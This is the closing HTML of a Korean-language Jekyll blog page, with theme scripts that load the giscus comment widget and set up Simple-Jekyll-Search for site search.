  <!-- https://giscus.app/ -->
<script>
  (function () {
    const themeMapper = Theme.getThemeMapper('light', 'dark_dimmed');
    const initTheme = themeMapper[Theme.visualState];

    let lang = 'ko';if (lang.length > 2 && !lang.startsWith('zh')) {
      lang = lang.slice(0, 2);
    }

    let giscusAttributes = {
      src: 'https://giscus.app/client.js',
      'data-repo': 'woojin03/woojin03.github.io',
      'data-repo-id': 'R_kgDOOhC6vA',
      'data-category': 'General',
      'data-category-id': 'DIC_kwDOOhC6vM4CavJj',
      'data-mapping': 'pathname',
      'data-strict' : '0',
      'data-reactions-enabled': '1',
      'data-emit-metadata': '0',
      'data-theme': initTheme,
      'data-input-position': 'bottom',
      'data-lang': lang,
      'data-loading': 'lazy',
      crossorigin: 'anonymous',
      async: ''
    };

    let giscusNode = document.createElement('script');
    Object.entries(giscusAttributes).forEach(([key, value]) =>
      giscusNode.setAttribute(key, value)
    );

    const $footer = document.querySelector('footer');
    $footer.insertAdjacentElement("beforebegin", giscusNode);

    addEventListener('message', (event) => {
      if (event.source === window && event.data && event.data.id === Theme.ID) {
        const newTheme = themeMapper[Theme.visualState];

        const message = {
          setConfig: {
            theme: newTheme
          }
        };

        const giscus =
          document.getElementsByClassName('giscus-frame')[0].contentWindow;
        giscus.postMessage({ giscus: message }, 'https://giscus.app');
      }
    });
  })();
</script>



    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">검색 결과가 없습니다.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

